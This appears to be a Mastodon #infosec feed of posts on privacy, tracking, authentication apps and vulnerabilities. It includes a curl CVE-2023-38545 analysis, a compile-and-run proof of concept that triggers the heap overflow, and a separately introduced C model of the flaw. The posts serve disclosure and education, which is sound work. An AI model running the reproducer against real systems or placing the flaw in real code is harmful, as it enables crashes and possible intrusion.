
Items tagged with: infosec


Random strangers getting paid to 'relay' YOUR texted login codes from THEIR phone numbers.

Privacy & security nightmare fuel.

Industry is turning away from texted verification because they are insecure... so what is #telegram thinking?

https://techcrunch.com/2024/03/25/telegrams-peer-to-peer-sms-login-service-is-a-privacy-nightmare/

#cybersecurity #infosec #privacy #doxxing #stalking #surveillance


You know it's interesting that I think @thunderbird is probably the one piece of software I have been using since Windows XP as a kid and still use it to this day. I even pay $10/year for a plugin to make Thunderbird work with my Office365 I use for my content creation so I can use it seamlessly on #Linux for contacts, calendar, and mail integration.

Despite all the email providers I have hopped between I still have used Thunderbird since around 2005 or 2006 #infosec #cybersecurity #opensource


Having trouble thinking of password security questions? Try one of these:

#infosec


No more rocket science, I'm moving to Post-Quantum encryption any day now...
https://tuta.com/blog/post-quantum-cryptography

@Tutanota
#infosec #cryptography


"For years, the antivirus software company harvested information from users’ web browsers without their consent." #infosec #privacy

Its clients have included Home Depot, Google, Microsoft, Pepsi, and McKinsey.

https://www.theverge.com/2024/2/22/24080135/avast-security-privacy-software-ftc-fine-data-harvesting


I'm getting really tired... -w-

summary of today:

someone on a Japanese hacker forum decided it was a good idea to spam the entire Fediverse because they wanted to cancel a minor that DDoSed a Discord bot which apparently made them lose millions (what?)

A Discord bot. I can't make this shit up man.

The real culprit seems to be someone who goes by mumei in the ctkpaarr.org forums, whose first post was literally a threat to ap12: if they don't delete their "Kuroneko Server" Discord bot, they will spam every blog, forum and SNS and cancel him.

This shit is ridiculous.

The ap12 account from mastodon-japan was actually fake, and this dude impersonated a minor to get all of the Fediverse (us) to bully him.

The forum admins didn't even stop this. Why? lulz apparently. #fediblockmeta #fediadmins #fediadmin #mastoadmin #mastoadmins #spam #cybercrime #cybersec #infosec #drama #discord


NEW: WhatsApp will soon make it possible to chat with people who use other messaging apps. It's revealed some more details on how that will work.

— Apps will need to sign an agreement with Meta, then connect to its servers.
— Meta wants people to use the Signal Protocol, but also says other encryption protocols can be used if they can meet WhatsApp's standards
— WhatsApp has been testing with Matrix in recent months, although nothing is agreed yet. Swiss app Threema says it won't become interoperable

https://www.wired.com/story/whatsapp-interoperability-messaging/ #tech #whatsapp #dma #infosec #news #technology


This screenshot shows the app analytics data sent by two different #iOS apps: Duolingo and Tinder. What's the likelihood that both apps are installed on the same device? 💯? 🤯

Both apps use Unity Ads. The data in the screenshot is collected by the Unity Ads framework included in these two apps, and any app that uses Unity Ads. The data is sent to the same Unity server. As a result, Unity Ads can easily fingerprint users and track them across different apps.

#privacy #tracking #Apple #infosec


Hey #furries there's a bill in Oklahoma that was introduced & would punish children for dressing as a furry at school & have them taken away by Animal Control.

Rep. Humphrey has introduced a heap of shitty bills.😭

Bill Text: http://webserver1.lsb.state.ok.us/cf_pdf/2023-24%20INT/hB/HB3084%20INT.PDF

Other details: https://legiscan.com/OK/bill/HB3084/2024

#tech #infosec #nerds #oklahoma


Getting security online right seems like a daunting task. But one thing is certain: Password managers help! 💪

🔥Here are our top three: https://tuta.com/blog/best-password-manager 🔥

What are your favorite #PasswordManagers

#privacy #security #opsec #passwords #passwordfatigue #databreach #breachdata #infosec

  • KeePassXC (49%, 218 votes)
  • Bitwarden (46%, 201 votes)
  • Pass (4%, 18 votes)
437 voters. Poll end: 1 month ago


What was your favorite #infosec talk, podcast, or white paper of 2023?


I feel like there's a whole bunch of cool accounts on Mastodon I haven't even heard of yet.
I love #infosec #3dprinting #lego #tcg #science #tech #memes and ducks 🦆​

Any suggestions? Tag anyone you think I should follow!


LibreOffice supports symmetric and asymmetric encryption for OpenDocument Format (ODF) files.

Symmetric encryption: https://en.wikipedia.org/wiki/Symmetric-key_algorithm
Asymmetric encryption: https://en.wikipedia.org/wiki/Public-key_cryptography

Select File > Save/Save As

The "Save with password" option encrypts the file with AES-256.
The "Encrypt with GPG key" option encrypts the file with a public key.

Website: https://www.libreoffice.org
Mastodon: @libreoffice

#LibreOffice #Encryption #OpenSource #OpenPGP #PGP #GnuPG #GPG #InfoSec #Privacy #Security


Fascinating and sophisticated MiTM ('man in the middle') at Hetzner (DE) and Linode, targeting Russia's largest XMPP/Jabber (civilian) chat service. The authors of the article make a reasonably compelling case that "this is lawful interception Hetzner and Linode were forced to setup."

https://notes.valdikss.org.ru/jabber.ru-mitm/

Excellent mitigation walkthrough here:

https://www.devever.net/~hl/xmpp-incident

Sure gets me thinking.

#infosec #sysadmin #forensics


#LibreOffice posted an article titled "WE WANT TO USE OUR USERS PERSONAL DATA" at https://design.blog.documentfoundation.org/2022/11/01/community-support-needed-we-want-to-use-our-users-personal-data/

LibreOffice was promoting a data collaboration with a company called polypoly. That article appears to contradict this post.

In the last entry in the comments section of the article the author states the project is on hold.

@libreoffice, what is the status of this project with polypoly? Is it still on hold or has it been cancelled?

#Privacy #InfoSec #TheDocumentFoundation @tdforg


Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general, state engines are quite difficult for static analysis tools since, as the name implies, the state of the various variables depends on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
    (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then sets “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
  infof(data, "SOCKS5: server resolving disabled for hostnames of "
        "length > 255 [actual len=%zu]", hostname_len);
  socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, the later CONNECT_RESOLVE_REMOTE state checks whether remote name resolution should be used or not:

if(!socks5_resolve_local) {
  if (… sx->hostname is literal IPv6 address …) {
    … use ipv6 address direct …
  }
  else if (… sx->hostname is literal IPv4 address …) {
    … use ipv4 address direct …
  }
  else {
    socksreq[len++] = 3;
    socksreq[len++] = (char) hostname_len; /* one byte address length */
    memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
    len += hostname_len;
  }
}

As the “socks5_resolve_local” flag is FALSE for the excessively long hostname, the “socksreq” heap buffer is overflowed by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec
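The pattern the post above describes, as an added illustration that is not curl's own code: a small model of the SOCKS5 state machine in which the "resolve locally" decision is taken in the INIT step but held in a local recomputed on every step, beside the variant that stores the decision in the state struct. The step names, the request buffer size (REQ_BUF_SIZE) and the struct layout are assumptions made for the example; the request buffer is never actually overrun, the model clamps the copy and reports what the real memcpy would have done.

```c
/* Model of the state-machine flaw behind curl CVE-2023-38545.
 * Added illustration, not curl's code: step names, REQ_BUF_SIZE and the
 * struct layout are assumed for the example. The "resolve locally"
 * decision is made in INIT but lives in a local that is recomputed from
 * the proxy type on every step, so the later step sees the stale default
 * and encodes an over-long hostname into a one-byte length field. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_SOCKS5_NAME 255   /* RFC 1928: domain-name length is one byte */
#define REQ_BUF_SIZE    300   /* assumed request buffer size for the model */

enum socks_step { STEP_INIT, STEP_CONNECT_RESOLVE_REMOTE, STEP_DONE };

struct socks_state {
    enum socks_step step;
    bool resolve_local;       /* the fixed variant keeps the decision here */
};

struct outcome {
    size_t bytes_needed;      /* request bytes the remote-resolve path wants */
    unsigned char len_byte;   /* what the one-byte length field would hold */
    bool overflow;            /* bytes_needed > REQ_BUF_SIZE */
    bool resolved_locally;    /* INIT's decision survived to the later step */
};

/* Run the model for a socks5h-style proxy (remote resolution requested).
 * keep_flag_in_state selects the fixed variant. The request buffer is
 * never overrun here: the copy is clamped and the overflow reported. */
static struct outcome run_socks5(const char *host, bool keep_flag_in_state)
{
    struct socks_state sx = { STEP_INIT, false };
    unsigned char req[REQ_BUF_SIZE];
    size_t host_len = strlen(host);
    struct outcome o = { 0, 0, false, false };

    while (sx.step != STEP_DONE) {
        /* Vulnerable pattern: recomputed per step from the proxy type alone.
         * For socks5h the proxy type means "remote resolve", i.e. false. */
        bool resolve_local = keep_flag_in_state ? sx.resolve_local : false;

        switch (sx.step) {
        case STEP_INIT:
            if (!resolve_local && host_len > MAX_SOCKS5_NAME) {
                resolve_local = true;           /* decision taken here ... */
                if (keep_flag_in_state)
                    sx.resolve_local = true;    /* ... persisted only when fixed */
            }
            sx.step = STEP_CONNECT_RESOLVE_REMOTE;
            break;

        case STEP_CONNECT_RESOLVE_REMOTE:
            if (!resolve_local) {
                size_t len = 0;
                req[len++] = 5;                 /* VER */
                req[len++] = 1;                 /* CMD = CONNECT */
                req[len++] = 0;                 /* RSV */
                req[len++] = 3;                 /* ATYP = domain name */
                o.len_byte = (unsigned char)host_len;  /* silently truncated */
                req[len++] = o.len_byte;
                o.bytes_needed = len + host_len;
                o.overflow = o.bytes_needed > sizeof req;
                /* the real code does memcpy(&req[len], host, host_len) here */
                memcpy(&req[len], host, o.overflow ? sizeof req - len : host_len);
            } else {
                o.resolved_locally = true;      /* local resolve: no name in packet */
            }
            sx.step = STEP_DONE;
            break;

        case STEP_DONE:
            break;
        }
    }
    return o;
}

int main(void)
{
    char long_host[400];
    memset(long_host, 'A', sizeof long_host - 1);
    long_host[sizeof long_host - 1] = '\0';

    struct outcome bad = run_socks5(long_host, false);
    struct outcome good = run_socks5(long_host, true);
    printf("vulnerable: needs %zu bytes, len byte=%u, overflow=%d\n",
           bad.bytes_needed, (unsigned)bad.len_byte, bad.overflow);
    printf("fixed:      resolved locally=%d, overflow=%d\n",
           good.resolved_locally, good.overflow);
    return 0;
}
```

With a 399-character name the vulnerable run reports 404 bytes needed against a 300-byte buffer and a length byte of 143 (399 modulo 256), which is exactly why a static checker has nothing to flag: every individual line is fine, only the value carried between steps is wrong. The fixed run never reaches the copy. Note that the variant shown persists the flag as the post suggests; curl's own fix in 8.4.0 goes further and fails the request outright when a name longer than 255 bytes is combined with remote resolution, rather than silently switching to local resolution.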


Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
#include <curl/curl.h>
#include <string.h>
int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    char url[32768];
    memcpy(url, "https://", 8);
    memset(url + 8, 'A', sizeof(url) - 8 - 1);
    url[sizeof(url) - 1] = '\0';
    curl_easy_setopt(curl, CURLOPT_URL, url);
    (void)curl_easy_perform(curl);
    curl_easy_cleanup(curl);
  }
  return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use a socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly setting the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

#infosec


Some exciting news: Over the past few months I have been working on founding a new organization: Blodeuwedd Labs (@blodeuweddlabs)

We are now in a position to offer subsidized security assessments (and other services) for open source projects.

(In addition to a whole array of analysis, development, and custom research offerings for everyone else)

Announcement (and more info): https://blodeuweddlabs.com/news/open-source-review-announce/

#infosec #security #appsec #canada #opensource


If you're using #bitwarden, make sure to change the KDF algorithm to Argon2id[^1] which is much more robust against GPU-powered attacks compared to its counterpart.

You can play around with this little calculator to see the impact of each algorithm on cracking cost estimation: https://passwordbits.com/passphrase-cracking-calculator/

[^1]: https://bitwarden.com/help/what-encryption-is-used/#argon2id

#security #infosec #password


:google: BREAKING: #Google to start deleting unused #email accounts so other people can use them.

🤔 What could possibly go wrong?

🤦‍♂️ Techbros are (still) idiots.

#Gmail #privacy #infosec

https://blog.google/technology/safety-security/updating-our-inactive-account-policies/


Google has just updated its 2FA Authenticator app and added a much-needed feature: the ability to sync secrets across devices.

TL;DR: Don't turn it on.

The new update allows users to sign in with their Google Account and sync 2FA secrets across their iOS and Android devices.

We analyzed the network traffic when the app syncs the secrets, and it turns out the traffic is not end-to-end encrypted. As shown in the screenshots, this means that Google can see the secrets, likely even while they’re stored on their servers. There is no option to add a passphrase to protect the secrets, to make them accessible only by the user.

Why is this bad?

Every 2FA QR code contains a secret, or a seed, that’s used to generate the one-time codes. If someone else knows the secret, they can generate the same one-time codes and defeat 2FA protections. So, if there’s ever a data breach or if someone obtains access .... 🧵

#Privacy #Cybersecurity #InfoSec #2FA #Google #Security


This dumb password rule is from Banco Mercantil.

8 to 15 chars. No special chars allowed but requires special chars. Also requires lowercase, uppercase, and numbers. Consecutive chars are prohibited. Did I mention the page hangs while you type? That eye icon tho.

https://dumbpasswordrules.com/sites/banco-mercantil/

#password #passwords #infosec #cybersecurity #dumbpasswordrules


So Google is now preventing people from removing location data from photos taken with Pixel phones.

Remember when Google's corporate motto was "don't be evil?"

Obviously, accurate location data on photos is more useful to a data mining operation like Google.

From Google: "Important: You can only update or remove estimated locations. If the location of a photo or video was automatically added by your camera, you can't edit or remove the location."

It's enshitification in action.

Source: https://support.google.com/photos/answer/6153599?hl=en&sjid=8103501961576262529-AP

#technology #tech @technology #business #enshitification #Android #Google @pluralistic #infosec


#Mozilla has done some great things with #Firefox over the years, but Total Cookie Protection (essentially isolated cookie jars) is one of the most robust and privacy-conscious ways of handling cookies that I've seen in any browser today. It's a natural evolution of the "container tab" concept that prevents third parties from easily tracking you across the web.

https://blog.mozilla.org/en/mozilla/firefox-rolls-out-total-cookie-protection-by-default-to-all-users-worldwide/

#Tech #Browser #Privacy #InfoSec #Security #CyberSecurity #DataSecurity #Tracking


Hey there -- we're Let's Encrypt, the free and open certificate authority serving over 300 million websites worldwide. We're new to Mastodon and are excited to get to know the infosec community in this new space!

https://letsencrypt.org/

#opensource #TLS #PKI #infosec


Yours truly is looking for an #InfoSec / #Cybersecurity job in a safer state than Florida. I do pretty much all things security... like consulting, malware analysis, auditing, compliance, blue team, red team, purple team, SecDev, SecOps, SecDevOps, etc.

My kids are all grown now, so I am more than willing to travel / relocate. If you have any leads or tips on some good companies, please let me know.

#GetFediHired
[matrix] • [SimpleX]


Microsoft Authenticator prompts the user to accept sharing analytics during the first launch. The prompt only dismisses when the user taps on "Accept." In fact, the app starts sending analytics even before accepting the privacy statement.🤦‍♂️

In this video, we downloaded the authenticator app from the App Store and we opened it as we monitored the iPhone network traffic. While the app was showing the permission prompt, we captured at least 3 calls made by the app sending diagnostics to Microsoft. The app sent 14 KB of analytics even before accepting the prompt.

The message on the prompt actually says that Microsoft needs to collect diagnostic data in order to keep Authenticator secure and up to date. 😵‍💫

#Privacy #Cybersecurity #2FA #InfoSec #Security #Microsoft

https://youtu.be/r5456XXG6v0


Many iPhone users are asking us to recommend safe authenticator apps. Well, the App Store is making it useless to recommend any app. No matter what you search for, the top hit is almost always an ad for a scam app.

#Apple #AppStore #2FA #InfoSec


Please boost! We are *hiring* for *two* jobs in information security! Come work with our amazing team building solutions for the security have-nots in our world!

Red Queen Dynamics needs 1) a leader for engineering/cloud infrastructure, and 2) a product designer. We are a remote-first security company and we welcome people from all backgrounds and life journeys. #infosec #infosecjobs #hiring #cybersecurity

You can apply here! Tech Lead: https://www.linkedin.com/jobs/view/3475289250/

Product Designer: https://www.linkedin.com/jobs/view/3475289426/

Or stay up to date with all our job postings on our website: https://rqdn.io/career-opportunities


I know there is a lot going on at Twitter right now, but here's one more thing. Twitter is ignoring #GDPR requests from people to delete their DMs.

At the moment, when you press delete on a Twitter DM (an individual message or conversation) the DM isn't actually deleted from Twitter's servers, just your inbox view.

So people in Europe have been making requests for Twitter to blitz all their messages. It hasn't properly answered them. And now regulators are looking at it

Full story here: https://www.wired.com/story/delete-twitter-dms-gdpr/

#Twitter #gdpr #infosec #technology #news #wired


It's trivial to determine the real IP of a Mastodon server behind Cloudflare. All it takes is one well-crafted request:

https://gist.github.com/cutiful/4f36da3ed37b24f9a7106064393f5e7f

I wonder how many instance admins using Cloudflare know about this? My hunch is most do not, because the primary justification I see for using Cloudflare here is DDoS protection.

Cloudflare won't help if the attacker knows your origin IP, and you can't hide that with Cloudflare alone, due to the nature of ActivityPub.

#MastoAdmin #InfoSec


People following my account for a while probably noticed me talking about South Korea every now and then. I’ve hinted towards doing some important research, and now the time has finally come for the first disclosures.

But first I need to do a bunch of explaining because most people (my past self from a few months ago included) are largely unfamiliar with the Korean software landscape. See: they have those “security” applications that everyone has to install if they want to use online banking for example.

What could possibly go wrong with applications developed by private vendors without any kind of security vetting and that everyone in a country has to install, whether they like it or not? A lot of course.

In this first blog post I explain how in my limited understanding the current situation came about, show why the companies lack incentive to really invest in security and give you a first slight idea of the disastrous consequences.

No, I’m not exaggerating. The next blog post is scheduled for January 9th, and it will be about a specific application. I submitted seven vulnerability reports for this one. It took a real issue and claimed to have solved it – by making matters considerably worse than they were.

https://palant.info/2023/01/02/south-koreas-online-security-dead-end/

#infosec #ApplicationSecurity #privacy #korea


Compromised PyTorch-nightly dependency chain between December 25th and December 30th, 2022.

Steals all your SSH keys!

"If you installed PyTorch-nightly on Linux via pip between December 25, 2022 and December 30, 2022, please uninstall it and torchtriton immediately, and use the latest nightly binaries (newer than Dec 30th 2022)."

#infosec #machinelearning #deeplearning

https://pytorch.org/blog/compromised-nightly-dependency/

https://news.ycombinator.com/item?id=34202836


🔓 Like good neocolonizers, #humanitarian organizations & #nonprofits, like militaries, also collect vast amounts of #biometric & other private information about people with reckless disregard for basic #privacy and #security concepts.

✊🏽 We must hold them accountable for the risks and damages their actions cause: it's unacceptable to allow society to continue this way.

:pesthorn: Thanks to #CCC for helping expose the dangerous truth.

#SurveillanceCapitalism #infosec

https://web.archive.org/web/20221227125216/https://www.nytimes.com/2022/12/27/technology/for-sale-on-ebay-a-military-database-of-fingerprints-and-iris-scans.html